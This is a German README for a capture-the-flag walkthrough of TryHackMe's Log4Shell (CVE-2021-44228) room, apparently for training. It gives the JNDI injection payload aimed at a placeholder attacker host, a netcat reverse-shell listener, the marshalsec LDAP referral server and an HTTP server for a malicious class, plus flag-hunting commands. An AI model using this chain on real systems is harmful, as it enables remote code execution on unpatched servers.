
Dieses Repository bietet eine detaillierte Anleitung zum *Solar Exploiting Log4j Raum* auf TryHackMe, mit Fokus auf die Ausnutzung der kritischen Log4Shell-Schwachstelle (CVE-2021-44228). Das Projekt demonstriert, wie Angreifer unsichere Protokollierungsmechanismen in Java-Anwendungen ausnutzen können, um Remote-Codeausführung zu erreichen.
Plattform: TryHackMe
Schwierigkeit: Mittel
Thema: Log4Shell (Log4j-Sicherheitslücke)
Die Log4j-Sicherheitslücke (CVE-2021-44228) ausnutzen, um Remote-Codeausführung zu erlangen und Flags zu erbeuten.
nmap -sC -sV <TARGET_IP>
Die Log4j-Sicherheitslücke erlaubt JNDI-Injection:
${jndi:ldap://<ATTACKER_IP>:1389/a}
Wenn die Eingabe protokolliert wird → liegt eine Sicherheitslücke vor.
nc -lvnp 4444
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package
LDAP-Server ausführen:
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
python3 -m http.server 8000
Erstelle bösartige Java-Klasse (Exploit.class)
Payload in anfälliges Feld injizieren:
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
💡 Verwende Header wie:
Sobald ausgelöst:
Prüfe:
sudo -l
Suche nach:
find / -name flag.txt 2>/dev/null
cat flag.txt